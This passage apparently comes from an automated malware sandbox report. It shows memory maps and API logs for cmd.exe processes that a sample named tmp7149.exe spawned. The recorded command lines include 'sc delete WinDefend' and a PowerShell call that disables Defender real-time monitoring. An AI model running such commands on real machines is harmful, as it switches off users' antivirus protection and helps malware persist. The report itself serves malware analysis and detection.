| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
550
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00817fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x01daffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001db0000 | 0x01db0000 | 0x020f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02100000 | 0x023cefff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a090000 | 0x4a0dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x754b0000 | 0x754b6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x550
59
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:28:02 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 191350 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a090000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\sc.exe, os_pid = 0xa6c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #19: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:19, Reason: Child Process |
| Unmonitor | End Time: 00:02:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x600 |
| Parent PID | 0x668 (c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
5F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00120000 | 0x00186fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00770fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x01b7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b80000 | 0x01b80000 | 0x01ec2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01ed0000 | 0x0219efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a090000 | 0x4a0dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x754b0000 | 0x754b6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x5f0
59
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:28:02 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 191444 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a090000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\system32\sc.exe, os_pid = 0x9b8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #20: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:20, Reason: Child Process |
| Unmonitor | End Time: 00:02:42, Reason: Self Terminated |
| Monitor Duration | 00:00:22 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x558 |
| Parent PID | 0x668 (c:\users\aetadzjz\appdata\roaming\windefrag\tmp7149.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
97C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00210000 | 0x00276fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x01cfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d00000 | 0x01d00000 | 0x02042fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02050000 | 0x0231efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a090000 | 0x4a0dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x754b0000 | 0x754b6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
